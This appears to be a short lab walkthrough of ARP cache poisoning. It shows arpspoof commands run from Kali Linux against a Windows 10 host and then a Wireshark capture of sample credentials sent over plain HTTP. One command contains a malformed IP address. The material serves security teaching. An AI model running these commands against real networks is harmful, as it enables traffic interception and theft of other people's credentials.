# ARP Cache poisoning ### Setup Install arpspoof on Kali Linux (In my case it was not working before...) > sudo apt install dsniff Attacker IP: 192.168.71.131 (Kali Linux) Target IP: 192.168.71.149 (Win10 Box) Gateway IP: 192.168.71.1 > netstat -nr ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-Mhi4v8FiqtnBNIy4ydf%2Fmitm01.png?alt=media\&token=aca12a66-2b85-49d8-bdb5-f71d40566d99) Let's ping target ip, gateway and check the arp cache: > arp
arp cache
Attacker MAC Address:
ARP Cache on target before attack:
### ARP Cache Poisoning > arpspoof -i eth1 192.168.71.1 192.168.149 > > arpspoof -i eth1 192.168.71.149 192.168.71.1
ARP Cache on target
### Grab credentials On Kali Linux start Wireshark and listen on the eth1 interface. On the windows box let's navigate to Enter some sample credentials here: test / SecurePassw0rd In wireshark set a filter to http and search the POST Request Follow HTTP Stream ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiQ0jsBv0bDRYEz3-3%2Fmitm08.png?alt=media\&token=e805b725-d819-4c56-8c51-a41ac29955b9) Follow the POST Request ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-MhhXNgvN7rwHmkmgxny%2F-MhiQCM2rfnj55TgtJvI%2Fmitm09.png?alt=media\&token=c5e0ec71-0b9a-4656-be71-789cf469935d) Note: http is unencrypted and therefore we can see the password in cleartext. If the connection would be https instead, it would be much harder (or impossible) to grab the password.